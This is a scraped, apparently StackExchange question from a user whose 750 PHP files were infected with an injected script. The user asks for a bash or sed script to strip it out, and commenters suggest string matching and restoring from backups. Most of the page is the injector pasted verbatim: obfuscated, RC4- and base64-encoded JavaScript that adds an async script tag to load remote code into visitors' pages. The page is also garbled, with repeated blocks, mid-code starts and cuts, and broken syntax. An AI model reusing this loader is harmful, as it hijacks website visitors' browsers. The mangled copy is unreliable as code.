_0x130bx10=String(_0x130bxf)[_0x69b4[17]](/=+$/,_0x69b4[16]);for(var _0x130bx11=0x0,_0x130bx12,_0x130bx13,_0x130bx14=0x0,_0x130bx15=_0x69b4[16];_0x130bx13= _0x130bx10[_0x69b4[18]](_0x130bx14++);~_0x130bx13&& (_0x130bx12= _0x130bx11% 0x4?_0x130bx12* 0x40+ _0x130bx13:_0x130bx13,_0x130bx11++ % 0x4)?_0x130bx15+= String[_0x69b4[19]](0xff& _0x130bx12>> (-0x2* _0x130bx11 & 0x6)):0x0){_0x130bx13= _0x130bxe[_0x69b4[20]](_0x130bx13)};return _0x130bx15})}());var _0x130bx16=function(_0x130bx17,_0x130bx9){var _0x130bx18=,_0x130bx19=0x0,_0x130bx1a,_0x130bx1b=_0x69b4[16],_0x130bx1c=_0x69b4[16];_0x130bx17= atob(_0x130bx17);for(var _0x130bx1d=0x0,_0x130bx1e=_0x130bx17[_0x69b4[21]];_0x130bx1d< _0x130bx1e;_0x130bx1d++){_0x130bx1c+= _0x69b4[22]+ (_0x69b4[24]+ _0x130bx17[_0x69b4[26]](_0x130bx1d)[_0x69b4[25]](0x10))[_0x69b4[23]](-0x2)};_0x130bx17= decodeURIComponent(_0x130bx1c);for(var _0x130bx1f=0x0;_0x130bx1f< 0x100;_0x130bx1f++){_0x130bx18[_0x130bx1f]= _0x130bx1f};for(_0x130bx1f= 0x0;_0x130bx1f< 0x100;_0x130bx1f++){_0x130bx19= (_0x130bx19+ _0x130bx18[_0x130bx1f]+ _0x130bx9[_0x69b4[26]](_0x130bx1f% _0x130bx9[_0x69b4[21]]))% 0x100;_0x130bx1a= _0x130bx18[_0x130bx1f];_0x130bx18[_0x130bx1f]= _0x130bx18[_0x130bx19];_0x130bx18[_0x130bx19]= _0x130bx1a};_0x130bx1f= 0x0;_0x130bx19= 0x0;for(var _0x130bx20=0x0;_0x130bx20< _0x130bx17[_0x69b4[21]];_0x130bx20++){_0x130bx1f= (_0x130bx1f+ 0x1)% 0x100;_0x130bx19= (_0x130bx19+ _0x130bx18[_0x130bx1f])% 0x100;_0x130bx1a= _0x130bx18[_0x130bx1f];_0x130bx18[_0x130bx1f]= _0x130bx18[_0x130bx19];_0x130bx18[_0x130bx19]= _0x130bx1a;_0x130bx1b+= String[_0x69b4[19]](_0x130bx17[_0x69b4[26]](_0x130bx20)^ _0x130bx18[(_0x130bx18[_0x130bx1f]+ _0x130bx18[_0x130bx19])% 0x100])};return _0x130bx1b};_0x4824[_0x69b4[27]]= _0x130bx16;_0x4824[_0x69b4[28]]= {};_0x4824[_0x69b4[10]]=  !!};var _0x130bx21=_0x4824[_0x69b4[28]][_0x130bx8];if(_0x130bx21=== undefined){if(_0x4824[_0x69b4[29]]=== undefined){_0x4824[_0x69b4[29]]=  !!};_0x130bxa= _0x4824[_0x69b4[27]](_0x130bxa,_0x130bx9);_0x4824[_0x69b4[28]][_0x130bx8]= _0x130bxa}else {_0x130bxa= _0x130bx21};return _0x130bxa};var _0x4739d5=[_0x4824(_0x69b4[30],_0x69b4[31]),_0x4824(_0x69b4[32],_0x69b4[33]),_0x69b4[34],_0x69b4[35],_0x69b4[36],_0x69b4[37],_0x4824(_0x69b4[38],_0x69b4[39]),_0x4824(_0x69b4[40],_0x69b4[41]),_0x4824(_0x69b4[42],_0x69b4[43]),_0x4824(_0x69b4[44],_0x69b4[43]),_0x4824(_0x69b4[45],_0x69b4[46]),_0x4824(_0x69b4[47],_0x69b4[48])];var _0x3be76d=[_0x4739d5[0x0],_0x4739d5[0x1],_0x4739d5[0x2],_0x4739d5[0x3],_0x4739d5[0x4],_0x4739d5[0x5],_0x4739d5[0x6],_0x4739d5[0x7],_0x4739d5[0x8],_0x4739d5[0x9],_0x4739d5[0xa],_0x4739d5[0xb]];var _0x4f3f17=[_0x3be76d[0x0],_0x3be76d[0x1],_0x3be76d[0x2],_0x3be76d[0x3],_0x3be76d[0x4],_0x3be76d[0x5],_0x3be76d[0x6],_0x3be76d[0x7],_0x3be76d[0x8],_0x3be76d[0x9],_0x3be76d[0xa],_0x3be76d[0xb]];var _0x4d0c89=[_0x4f3f17[0x0],_0x4f3f17[0x1],_0x4f3f17[0x2],_0x4f3f17[0x3],_0x4f3f17[0x4],_0x4f3f17[0x5],_0x4f3f17[0x6],_0x4f3f17[0x7],_0x4f3f17[0x8],_0x4f3f17[0x9],_0x4f3f17[0xa],_0x4f3f17[0xb]];var _0x572eac=[_0x4d0c89[0x0],_0x4d0c89[0x1],_0x4d0c89[0x2],_0x4d0c89[0x3],_0x4d0c89[0x4],_0x4d0c89[0x5],_0x4d0c89[0x6],_0x4d0c89[0x7],_0x4d0c89[0x8],_0x4d0c89[0x9],_0x4d0c89[0xa],_0x4d0c89[0xb]];var _0x2b0b54=[_0x572eac[0x0],_0x572eac[0x1],_0x572eac[0x2],_0x572eac[0x3],_0x572eac[0x4],_0x572eac[0x5],_0x572eac[0x6],_0x572eac[0x7],_0x572eac[0x8],_0x572eac[0x9],_0x572eac[0xa],_0x572eac[0xb]];(function(){var _0x130bx28=document[_0x2b0b54[0x1]](_0x2b0b54[0x0]);_0x130bx28[_0x2b0b54[0x2]]= _0x2b0b54[0x3];_0x130bx28[_0x2b0b54[0x4]]=  !!;_0x130bx28[_0x2b0b54[0x5]]= _0x2b0b54[0x6];_0x130bx28[_0x2b0b54[0x7]]= _0x2b0b54[0x8];var _0x130bx29=document[_0x2b0b54[0x9]](_0x2b0b54[0x0])[0x0];_0x130bx29[_0x2b0b54[0xb]][_0x2b0b54[0xa]](_0x130bx28,_0x130bx29)}());/**


I need to create bash script or using sed to remove only this malicious files, and not impacted to the other php code.










share|improve this question

























  • So, search for a string in all the files and delete the files that contain a match?

    – 炸鱼薯条德里克
    Feb 28 at 8:24











  • Are you actually working with a compromised system?

    – Kusalananda
    Feb 28 at 8:28











  • @炸鱼薯条德里克 yes search for a string in all lthe files and delete the files that contain a match

    – Widi Anto
    Feb 28 at 8:30






  • 1





    If you have backups, take the system offline, restore a sufficiently-old backup, patch your system, reset database passwords, and go back online. This is not quite "nuke from orbit"-levels of safe, but much better than hoping you don't need to find hidden files, less scrambled payload, etc.

    – Ulrich Schwarz
    Feb 28 at 8:33






  • 1





    Related: How do I deal with a compromised server?

    – Kusalananda
    Feb 28 at 8:48














0












0








0








I got 750 files that have injected by malicious code, and here is the code :



var _0x6eea=["x56x79x7Ax43x6Bx63x4Bx65x77x37x67x39x64x43x6Cx36x77x70x6Ex43x6Fx63x4Fx57x51x38x4Bx57x63x57x44x44x74x47x67x63x77x70x6Bx3D","x4Dx73x4Bx76x77x34x72x44x6Ax4Dx4Bx6Bx59x77x37x43x69x57x6Ax43x71x38x4Fx57x56x77x3Dx3D","x63x38x4Bx43x77x6Fx66x43x71x63x4Fx6Bx77x71x41x7Ax77x70x76x44x73x63x4Fx64","x45x73x4Bx4Bx42x33x63x35x53x77x3Dx3D","x62x57x37x43x6Ex52x2Fx44x67x73x4Bx78x45x63x4Fx72x4Ax6Dx6Ax44x76x77x37x44x75x77x3Dx3D","x77x70x72x43x73x63x4Fx4Dx77x71x7Ax43x69x52x70x42x42x47x6Fx3D","x46x44x6Ax44x73x38x4Fx6Cx77x6Fx70x65x77x72x31x5Ax46x51x3Dx3D","x47x43x2Fx43x6Bx4Dx4Bx31x77x37x63x73x63x43x4Ex36x77x34x58x44x75x38x4Bx30x51x63x4Fx69x5Ax6Dx62x44x69x43x6Bx46x77x6Fx6Ex44x6Ax79x78x4Bx77x36x73x6Cx77x35x64x61x77x6Fx5Ax56x77x70x45x78x77x35x37x44x68x63x4Bx79x5Ax4Dx4Fx79x77x35x48x44x6Dx4Dx4Fx6Ex54x57x49x72x52x38x4Fx2Fx4Ax63x4Fx65x45x57x58x43x75x6Dx5Ax4Cx77x71x54x44x6Fx73x4Bx59x77x70x76x44x70x4Dx4Bx58x77x72x58x44x6Cx55x38x30x77x70x2Fx44x76x43x31x46x59x44x72x43x6Ex47x55x57x4Bx38x4Bx71x77x35x67x55x64x69x70x35x77x71x50x44x6Bx4Dx4Bx2Fx77x37x34x54x77x36x4Cx44x72x78x49x55x77x34x62x44x69x46x4Cx43x6Fx63x4Fx4Dx4Dx31x4Cx44x71x52x78x4Cx49x4Dx4Fx58x77x6Fx67x6Fx77x37x56x62x5Ax63x4Bx4Fx57x38x4Bx74x4Cx63x4Fx45x77x6Fx63x54x77x36x6Bx74x77x70x78x5Ax77x70x4Ax34x58x6Cx54x43x68x54x77x42x61x73x4Bx58x77x36x54x44x67x73x4Bx75x77x34x76x43x69x47x4Dx57x63x30x30x44x59x53x70x72x77x36x4Ex35x77x72x46x47x77x6Fx68x4Ex77x6Fx6Ax43x6Fx30x46x50x77x70x4Cx43x76x63x4Fx67x45x33x73x36x77x37x4Cx44x6Ax63x4Bx33x77x71x37x43x6Fx63x4Bx65x62x6Ax6Fx2Bx64x63x4Fx4Cx77x36x74x59x49x38x4Fx32x4Ax77x6Ex44x71x43x41x54x5Ax73x4Fx78x56x4Dx4Bx57x77x35x7Ax44x72x46x4Ax48x77x35x38x69x51x47x62x44x6Ex30x51x4Bx77x34x33x44x6Dx73x4Bx77x77x37x64x6Dx61x32x44x43x6Cx38x4Fx47x77x36x42x37x58x48x76x43x6Fx73x4Bx7Ax45x79x37x44x6Cx55x49x56x77x36x42x55x51x4Dx4Fx4Fx63x73x4Bx68x77x37x6Ex44x69x45x72x44x75x6Ax6Fx55x63x6Ax7Ax44x72x7Ax51x74x77x37x72x43x75x77x6Ex44x6Fx73x4Fx5Ax59x45x4Dx78x77x6Fx77x6Fx77x72x74x2Bx77x37x37x43x73x4Dx4Bx6Cx54x55x33x44x69x7Ax6Bx44x77x35x55x77x62x73x4Bx70x4Cx73x4Fx4Bx77x35x48x43x67x38x4Fx45x56x4Dx4Fx62x55x38x4Bx70x77x36x6Ex43x72x4Dx4Bx2Bx61x6Cx4Cx44x6Fx63x4Fx57x4Cx4Dx4Bx44x77x6Fx7Ax44x6Dx63x4Bx50x77x35x33x44x69x67x6Ax43x6Ax73x4Fx42x4Fx33x48x44x74x6Bx7Ax44x75x73x4Fx71x77x70x76x44x68x6Cx59x57x53x41x50x43x6Fx38x4Fx77x77x6Fx30x68x61x78x73x74x66x6Bx7Ax43x6Cx63x4Fx6Cx77x70x46x56x5Ax54x49x63x77x34x4Dx74x51x7Ax6Bx65x77x35x2Fx44x6Ax4Dx4Bx30x41x63x4Fx77x56x63x4Fx39x77x36x63x52x57x73x4Fx68x77x37x74x61x77x6Fx37x43x73x30x50x44x74x63x4Fx52x77x72x58x44x6Bx38x4Fx61x77x72x6Ax44x6Cx41x46x69x77x36x37x44x67x73x4Bx74x4Dx63x4Bx71x49x43x4Cx43x6Fx41x62x44x6Ex4Dx4Fx76x77x72x30x37x41x73x4Fx74x53x68x63x45x77x72x52x51x43x73x4Bx47x64x38x4Bx61x45x47x67x70x45x54x78x2Fx77x6Fx6Ax44x6Bx38x4Fx50x63x78x4Dx73x77x70x30x50x77x72x54x43x70x56x44x43x6Ex73x4Bx42x77x72x6Ex44x6Dx55x6Ex44x74x63x4Fx69x77x71x45x4Fx77x6Fx50x43x70x38x4Fx59x58x38x4Bx62x47x73x4Fx44x53x51x6Fx4Ax77x36x63x63x77x72x58x43x71x4Dx4Bx73x77x70x6Ax44x6Cx4Dx4Bx4Ex59x45x58x44x69x31x48x44x74x38x4Fx6Fx77x72x70x72x77x35x37x44x74x32x77x6Fx44x63x4Bx61x77x37x62x43x73x63x4Fx71x53x4Dx4Bx55x77x71x50x43x74x73x4Fx6Cx52x4Dx4Fx43x4Fx30x35x65x77x34x76x44x6Fx4Dx4Bx46x77x35x64x44x77x70x41x73x77x6Fx74x2Bx77x34x6Fx72x47x58x6Cx73x77x70x30x71x58x63x4Fx73x4Bx4Dx4Fx6Ax77x71x58x43x6Fx4Dx4Bx72x77x36x73x30x62x63x4Fx2Bx77x36x56x6Cx55x6Ex76x43x68x73x4Fx4Dx77x36x35x50x77x36x54x44x76x78x76x43x68x43x33x44x71x4Dx4Bx7Ax77x6Fx70x56x77x36x4Cx43x74x33x74x59x64x6Ax62x44x6Ex6Dx30x65x45x53x48x44x74x73x4Bx64x77x37x59x52x77x6Fx58x43x67x56x64x53x77x34x4Cx44x74x63x4Bx35x66x73x4Bx63x77x72x6Fx55x77x70x7Ax43x76x38x4Fx32x56x31x44x44x6Dx6Bx58x44x68x52x51x4Cx47x73x4Fx6Bx77x6Fx6Cx32x4Ax63x4Bx56x77x34x56x74x77x35x66x43x67x51x6Cx6Cx44x73x4Fx67x77x72x6Ax44x74x4Dx4Fx2Bx4Bx6Dx73x36x77x35x39x6Ax77x37x37x43x68x31x44x43x73x44x52x69x77x34x33x43x6Fx33x6Ex43x73x63x4Fx59x77x36x6Cx72x77x72x70x33x58x73x4Bx36x77x72x6Fx70x77x71x6Ax43x6Dx63x4Fx30x77x70x55x4Fx63x6Cx48x44x6Bx69x76x43x75x48x4Cx44x6Bx63x4Bx72x77x35x66x44x70x45x76x44x70x32x76x43x75x38x4Bx32x4Ex67x54x44x69x38x4Fx6Ax77x37x44x44x73x63x4Fx4Fx46x73x4Bx49x77x70x62x44x6Ex58x59x37x77x6Fx38x39x52x77x44x43x69x63x4Bx58x62x47x56x6Ex49x42x62x44x6Dx4Dx4Fx45x77x35x62x43x6Bx38x4Fx4Dx52x4Dx4Fx77x64x4Dx4Bx50x77x35x54x44x6Dx32x45x31x77x72x37x44x6Ax57x37x44x74x73x4Fx32x41x63x4Fx56x77x36x67x65x55x54x77x2Fx77x34x4Dx73x77x71x6Bx2Bx77x37x48x44x75x4Dx4Bx6Ex77x72x38x31x4Ex4Dx4Bx58x77x36x33x44x74x6Ax66x43x67x73x4Bx6Bx77x37x64x39x77x6Fx50x43x6Ex56x70x42x77x36x31x6Fx42x4Dx4Bx39x65x78x63x4Dx55x73x4Fx73x4Ax73x4Bx2Bx61x38x4Bx53x55x31x42x4Ax53x4Dx4Fx74x66x48x70x51x77x70x6Ax44x6Fx73x4Fx63x77x35x6Ex44x6Fx63x4Fx52x77x35x45x6Bx77x71x4Cx44x6Fx4Dx4Fx42x77x6Fx35x35x77x34x6Ax44x69x33x34x75x63x38x4Fx43x44x48x6Ax43x68x33x6Ex44x6Ax43x48x44x67x73x4Bx52x4Bx73x4Fx6Fx77x35x76x43x68x77x78x64x77x36x4Cx43x6Ax38x4Fx5Ax57x67x49x61x77x71x44x43x68x4Dx4Fx51x66x63x4Fx6Cx77x36x50x43x75x73x4Fx74x4Bx38x4Fx2Bx77x35x6Ax44x76x38x4Bx46x65x32x59x57x57x73x4Fx36x47x33x72x44x75x41x3Dx3D","x73x68x69x66x74","x70x75x73x68","x55x44x50x4Dx49x55","x72x65x74x75x72x6Ex20x28x66x75x6Ex63x74x69x6Fx6Ex28x29x20","x7Bx7Dx2Ex63x6Fx6Ex73x74x72x75x63x74x6Fx72x28x22x72x65x74x75x72x6Ex20x74x68x69x73x22x29x28x20x29","x29x3B","x41x42x43x44x45x46x47x48x49x4Ax4Bx4Cx4Dx4Ex4Fx50x51x52x53x54x55x56x57x58x59x5Ax61x62x63x64x65x66x67x68x69x6Ax6Bx6Cx6Dx6Ex6Fx70x71x72x73x74x75x76x77x78x79x7Ax30x31x32x33x34x35x36x37x38x39x2Bx2Fx3D","x61x74x6Fx62","","x72x65x70x6Cx61x63x65","x63x68x61x72x41x74","x66x72x6Fx6Dx43x68x61x72x43x6Fx64x65","x69x6Ex64x65x78x4Fx66","x6Cx65x6Ex67x74x68","x25","x73x6Cx69x63x65","x30x30","x74x6Fx53x74x72x69x6Ex67","x63x68x61x72x43x6Fx64x65x41x74","x58x70x44x42x61x53","x53x4Ax4Ex65x62x4B","x6Cx75x42x49x48x6B","x30x78x30","x43x31x25x4A","x30x78x31","x49x39x5Ax77","x74x79x70x65","x74x65x78x74x2Fx6Ax61x76x61x73x63x72x69x70x74","x61x73x79x6Ex63","x69x64","x30x78x32","x36x65x21x42","x30x78x33","x5Ax41x54x25","x30x78x34","x76x57x51x5D","x30x78x35","x30x78x36","x4Bx4Dx61x25","x30x78x37","x6Cx6Ax70x56"];var _0x69b4=[_0x6eea[0],_0x6eea[1],_0x6eea[2],_0x6eea[3],_0x6eea[4],_0x6eea[5],_0x6eea[6],_0x6eea[7],_0x6eea[8],_0x6eea[9],_0x6eea[10],_0x6eea[11],_0x6eea[12],_0x6eea[13],_0x6eea[14],_0x6eea[15],_0x6eea[16],_0x6eea[17],_0x6eea[18],_0x6eea[19],_0x6eea[20],_0x6eea[21],_0x6eea[22],_0x6eea[23],_0x6eea[24],_0x6eea[25],_0x6eea[26],_0x6eea[27],_0x6eea[28],_0x6eea[29],_0x6eea[30],_0x6eea[31],_0x6eea[32],_0x6eea[33],_0x6eea[34],_0x6eea[35],_0x6eea[36],_0x6eea[37],_0x6eea[38],_0x6eea[39],_0x6eea[40],_0x6eea[41],_0x6eea[42],_0x6eea[43],_0x6eea[44],_0x6eea[45],_0x6eea[46],_0x6eea[47],_0x6eea[48]];var _0x53ac=[_0x69b4[0],_0x69b4[1],_0x69b4[2],_0x69b4[3],_0x69b4[4],_0x69b4[5],_0x69b4[6],_0x69b4[7]];(function(_0x130bx3,_0x130bx4){var _0x130bx5=function(_0x130bx6){while(--_0x130bx6){_0x130bx3[_0x69b4[9]](_0x130bx3[_0x69b4[8]]())}};_0x130bx5(++_0x130bx4)}(_0x53ac,0x6b));var _0x4824=function(_0x130bx8,_0x130bx9){_0x130bx8= _0x130bx8- 0x0;var _0x130bxa=_0x53ac[_0x130bx8];if(_0x4824[_0x69b4[10]]=== undefined){(function(){var _0x130bxb=function(){var _0x130bxc;try{_0x130bxc= Function(_0x69b4[11]+ _0x69b4[12]+ _0x69b4[13])()}catch(_0x21cc70){_0x130bxc= window};return _0x130bxc};var _0x130bxd=_0x130bxb();var _0x130bxe=_0x69b4[14];_0x130bxd[_0x69b4[15]]|| (_0x130bxd[_0x69b4[15]]= function(_0x130bxf){var _0x130bx10=String(_0x130bxf)[_0x69b4[17]](/=+$/,_0x69b4[16]);for(var _0x130bx11=0x0,_0x130bx12,_0x130bx13,_0x130bx14=0x0,_0x130bx15=_0x69b4[16];_0x130bx13= _0x130bx10[_0x69b4[18]](_0x130bx14++);~_0x130bx13&& (_0x130bx12= _0x130bx11% 0x4?_0x130bx12* 0x40+ _0x130bx13:_0x130bx13,_0x130bx11++ % 0x4)?_0x130bx15+= String[_0x69b4[19]](0xff& _0x130bx12>> (-0x2* _0x130bx11 & 0x6)):0x0){_0x130bx13= _0x130bxe[_0x69b4[20]](_0x130bx13)};return _0x130bx15})}());var _0x130bx16=function(_0x130bx17,_0x130bx9){var _0x130bx18=,_0x130bx19=0x0,_0x130bx1a,_0x130bx1b=_0x69b4[16],_0x130bx1c=_0x69b4[16];_0x130bx17= atob(_0x130bx17);for(var _0x130bx1d=0x0,_0x130bx1e=_0x130bx17[_0x69b4[21]];_0x130bx1d< _0x130bx1e;_0x130bx1d++){_0x130bx1c+= _0x69b4[22]+ (_0x69b4[24]+ _0x130bx17[_0x69b4[26]](_0x130bx1d)[_0x69b4[25]](0x10))[_0x69b4[23]](-0x2)};_0x130bx17= decodeURIComponent(_0x130bx1c);for(var _0x130bx1f=0x0;_0x130bx1f< 0x100;_0x130bx1f++){_0x130bx18[_0x130bx1f]= _0x130bx1f};for(_0x130bx1f= 0x0;_0x130bx1f< 0x100;_0x130bx1f++){_0x130bx19= (_0x130bx19+ _0x130bx18[_0x130bx1f]+ _0x130bx9[_0x69b4[26]](_0x130bx1f% _0x130bx9[_0x69b4[21]]))% 0x100;_0x130bx1a= _0x130bx18[_0x130bx1f];_0x130bx18[_0x130bx1f]= _0x130bx18[_0x130bx19];_0x130bx18[_0x130bx19]= _0x130bx1a};_0x130bx1f= 0x0;_0x130bx19= 0x0;for(var _0x130bx20=0x0;_0x130bx20< _0x130bx17[_0x69b4[21]];_0x130bx20++){_0x130bx1f= (_0x130bx1f+ 0x1)% 0x100;_0x130bx19= (_0x130bx19+ _0x130bx18[_0x130bx1f])% 0x100;_0x130bx1a= _0x130bx18[_0x130bx1f];_0x130bx18[_0x130bx1f]= _0x130bx18[_0x130bx19];_0x130bx18[_0x130bx19]= _0x130bx1a;_0x130bx1b+= String[_0x69b4[19]](_0x130bx17[_0x69b4[26]](_0x130bx20)^ _0x130bx18[(_0x130bx18[_0x130bx1f]+ _0x130bx18[_0x130bx19])% 0x100])};return _0x130bx1b};_0x4824[_0x69b4[27]]= _0x130bx16;_0x4824[_0x69b4[28]]= {};_0x4824[_0x69b4[10]]=  !!};var _0x130bx21=_0x4824[_0x69b4[28]][_0x130bx8];if(_0x130bx21=== undefined){if(_0x4824[_0x69b4[29]]=== undefined){_0x4824[_0x69b4[29]]=  !!};_0x130bxa= _0x4824[_0x69b4[27]](_0x130bxa,_0x130bx9);_0x4824[_0x69b4[28]][_0x130bx8]= _0x130bxa}else {_0x130bxa= _0x130bx21};return _0x130bxa};var _0x4739d5=[_0x4824(_0x69b4[30],_0x69b4[31]),_0x4824(_0x69b4[32],_0x69b4[33]),_0x69b4[34],_0x69b4[35],_0x69b4[36],_0x69b4[37],_0x4824(_0x69b4[38],_0x69b4[39]),_0x4824(_0x69b4[40],_0x69b4[41]),_0x4824(_0x69b4[42],_0x69b4[43]),_0x4824(_0x69b4[44],_0x69b4[43]),_0x4824(_0x69b4[45],_0x69b4[46]),_0x4824(_0x69b4[47],_0x69b4[48])];var _0x3be76d=[_0x4739d5[0x0],_0x4739d5[0x1],_0x4739d5[0x2],_0x4739d5[0x3],_0x4739d5[0x4],_0x4739d5[0x5],_0x4739d5[0x6],_0x4739d5[0x7],_0x4739d5[0x8],_0x4739d5[0x9],_0x4739d5[0xa],_0x4739d5[0xb]];var _0x4f3f17=[_0x3be76d[0x0],_0x3be76d[0x1],_0x3be76d[0x2],_0x3be76d[0x3],_0x3be76d[0x4],_0x3be76d[0x5],_0x3be76d[0x6],_0x3be76d[0x7],_0x3be76d[0x8],_0x3be76d[0x9],_0x3be76d[0xa],_0x3be76d[0xb]];var _0x4d0c89=[_0x4f3f17[0x0],_0x4f3f17[0x1],_0x4f3f17[0x2],_0x4f3f17[0x3],_0x4f3f17[0x4],_0x4f3f17[0x5],_0x4f3f17[0x6],_0x4f3f17[0x7],_0x4f3f17[0x8],_0x4f3f17[0x9],_0x4f3f17[0xa],_0x4f3f17[0xb]];var _0x572eac=[_0x4d0c89[0x0],_0x4d0c89[0x1],_0x4d0c89[0x2],_0x4d0c89[0x3],_0x4d0c89[0x4],_0x4d0c89[0x5],_0x4d0c89[0x6],_0x4d0c89[0x7],_0x4d0c89[0x8],_0x4d0c89[0x9],_0x4d0c89[0xa],_0x4d0c89[0xb]];var _0x2b0b54=[_0x572eac[0x0],_0x572eac[0x1],_0x572eac[0x2],_0x572eac[0x3],_0x572eac[0x4],_0x572eac[0x5],_0x572eac[0x6],_0x572eac[0x7],_0x572eac[0x8],_0x572eac[0x9],_0x572eac[0xa],_0x572eac[0xb]];(function(){var _0x130bx28=document[_0x2b0b54[0x1]](_0x2b0b54[0x0]);_0x130bx28[_0x2b0b54[0x2]]= _0x2b0b54[0x3];_0x130bx28[_0x2b0b54[0x4]]=  !!;_0x130bx28[_0x2b0b54[0x5]]= _0x2b0b54[0x6];_0x130bx28[_0x2b0b54[0x7]]= _0x2b0b54[0x8];var _0x130bx29=document[_0x2b0b54[0x9]](_0x2b0b54[0x0])[0x0];_0x130bx29[_0x2b0b54[0xb]][_0x2b0b54[0xa]](_0x130bx28,_0x130bx29)}());/**


I need to create bash script or using sed to remove only this malicious files, and not impacted to the other php code.










share|improve this question
















I got 750 files that have injected by malicious code, and here is the code :



var _0x6eea=["x56x79x7Ax43x6Bx63x4Bx65x77x37x67x39x64x43x6Cx36x77x70x6Ex43x6Fx63x4Fx57x51x38x4Bx57x63x57x44x44x74x47x67x63x77x70x6Bx3D","x4Dx73x4Bx76x77x34x72x44x6Ax4Dx4Bx6Bx59x77x37x43x69x57x6Ax43x71x38x4Fx57x56x77x3Dx3D","x63x38x4Bx43x77x6Fx66x43x71x63x4Fx6Bx77x71x41x7Ax77x70x76x44x73x63x4Fx64","x45x73x4Bx4Bx42x33x63x35x53x77x3Dx3D","x62x57x37x43x6Ex52x2Fx44x67x73x4Bx78x45x63x4Fx72x4Ax6Dx6Ax44x76x77x37x44x75x77x3Dx3D","x77x70x72x43x73x63x4Fx4Dx77x71x7Ax43x69x52x70x42x42x47x6Fx3D","x46x44x6Ax44x73x38x4Fx6Cx77x6Fx70x65x77x72x31x5Ax46x51x3Dx3D","x47x43x2Fx43x6Bx4Dx4Bx31x77x37x63x73x63x43x4Ex36x77x34x58x44x75x38x4Bx30x51x63x4Fx69x5Ax6Dx62x44x69x43x6Bx46x77x6Fx6Ex44x6Ax79x78x4Bx77x36x73x6Cx77x35x64x61x77x6Fx5Ax56x77x70x45x78x77x35x37x44x68x63x4Bx79x5Ax4Dx4Fx79x77x35x48x44x6Dx4Dx4Fx6Ex54x57x49x72x52x38x4Fx2Fx4Ax63x4Fx65x45x57x58x43x75x6Dx5Ax4Cx77x71x54x44x6Fx73x4Bx59x77x70x76x44x70x4Dx4Bx58x77x72x58x44x6Cx55x38x30x77x70x2Fx44x76x43x31x46x59x44x72x43x6Ex47x55x57x4Bx38x4Bx71x77x35x67x55x64x69x70x35x77x71x50x44x6Bx4Dx4Bx2Fx77x37x34x54x77x36x4Cx44x72x78x49x55x77x34x62x44x69x46x4Cx43x6Fx63x4Fx4Dx4Dx31x4Cx44x71x52x78x4Cx49x4Dx4Fx58x77x6Fx67x6Fx77x37x56x62x5Ax63x4Bx4Fx57x38x4Bx74x4Cx63x4Fx45x77x6Fx63x54x77x36x6Bx74x77x70x78x5Ax77x70x4Ax34x58x6Cx54x43x68x54x77x42x61x73x4Bx58x77x36x54x44x67x73x4Bx75x77x34x76x43x69x47x4Dx57x63x30x30x44x59x53x70x72x77x36x4Ex35x77x72x46x47x77x6Fx68x4Ex77x6Fx6Ax43x6Fx30x46x50x77x70x4Cx43x76x63x4Fx67x45x33x73x36x77x37x4Cx44x6Ax63x4Bx33x77x71x37x43x6Fx63x4Bx65x62x6Ax6Fx2Bx64x63x4Fx4Cx77x36x74x59x49x38x4Fx32x4Ax77x6Ex44x71x43x41x54x5Ax73x4Fx78x56x4Dx4Bx57x77x35x7Ax44x72x46x4Ax48x77x35x38x69x51x47x62x44x6Ex30x51x4Bx77x34x33x44x6Dx73x4Bx77x77x37x64x6Dx61x32x44x43x6Cx38x4Fx47x77x36x42x37x58x48x76x43x6Fx73x4Bx7Ax45x79x37x44x6Cx55x49x56x77x36x42x55x51x4Dx4Fx4Fx63x73x4Bx68x77x37x6Ex44x69x45x72x44x75x6Ax6Fx55x63x6Ax7Ax44x72x7Ax51x74x77x37x72x43x75x77x6Ex44x6Fx73x4Fx5Ax59x45x4Dx78x77x6Fx77x6Fx77x72x74x2Bx77x37x37x43x73x4Dx4Bx6Cx54x55x33x44x69x7Ax6Bx44x77x35x55x77x62x73x4Bx70x4Cx73x4Fx4Bx77x35x48x43x67x38x4Fx45x56x4Dx4Fx62x55x38x4Bx70x77x36x6Ex43x72x4Dx4Bx2Bx61x6Cx4Cx44x6Fx63x4Fx57x4Cx4Dx4Bx44x77x6Fx7Ax44x6Dx63x4Bx50x77x35x33x44x69x67x6Ax43x6Ax73x4Fx42x4Fx33x48x44x74x6Bx7Ax44x75x73x4Fx71x77x70x76x44x68x6Cx59x57x53x41x50x43x6Fx38x4Fx77x77x6Fx30x68x61x78x73x74x66x6Bx7Ax43x6Cx63x4Fx6Cx77x70x46x56x5Ax54x49x63x77x34x4Dx74x51x7Ax6Bx65x77x35x2Fx44x6Ax4Dx4Bx30x41x63x4Fx77x56x63x4Fx39x77x36x63x52x57x73x4Fx68x77x37x74x61x77x6Fx37x43x73x30x50x44x74x63x4Fx52x77x72x58x44x6Bx38x4Fx61x77x72x6Ax44x6Cx41x46x69x77x36x37x44x67x73x4Bx74x4Dx63x4Bx71x49x43x4Cx43x6Fx41x62x44x6Ex4Dx4Fx76x77x72x30x37x41x73x4Fx74x53x68x63x45x77x72x52x51x43x73x4Bx47x64x38x4Bx61x45x47x67x70x45x54x78x2Fx77x6Fx6Ax44x6Bx38x4Fx50x63x78x4Dx73x77x70x30x50x77x72x54x43x70x56x44x43x6Ex73x4Bx42x77x72x6Ex44x6Dx55x6Ex44x74x63x4Fx69x77x71x45x4Fx77x6Fx50x43x70x38x4Fx59x58x38x4Bx62x47x73x4Fx44x53x51x6Fx4Ax77x36x63x63x77x72x58x43x71x4Dx4Bx73x77x70x6Ax44x6Cx4Dx4Bx4Ex59x45x58x44x69x31x48x44x74x38x4Fx6Fx77x72x70x72x77x35x37x44x74x32x77x6Fx44x63x4Bx61x77x37x62x43x73x63x4Fx71x53x4Dx4Bx55x77x71x50x43x74x73x4Fx6Cx52x4Dx4Fx43x4Fx30x35x65x77x34x76x44x6Fx4Dx4Bx46x77x35x64x44x77x70x41x73x77x6Fx74x2Bx77x34x6Fx72x47x58x6Cx73x77x70x30x71x58x63x4Fx73x4Bx4Dx4Fx6Ax77x71x58x43x6Fx4Dx4Bx72x77x36x73x30x62x63x4Fx2Bx77x36x56x6Cx55x6Ex76x43x68x73x4Fx4Dx77x36x35x50x77x36x54x44x76x78x76x43x68x43x33x44x71x4Dx4Bx7Ax77x6Fx70x56x77x36x4Cx43x74x33x74x59x64x6Ax62x44x6Ex6Dx30x65x45x53x48x44x74x73x4Bx64x77x37x59x52x77x6Fx58x43x67x56x64x53x77x34x4Cx44x74x63x4Bx35x66x73x4Bx63x77x72x6Fx55x77x70x7Ax43x76x38x4Fx32x5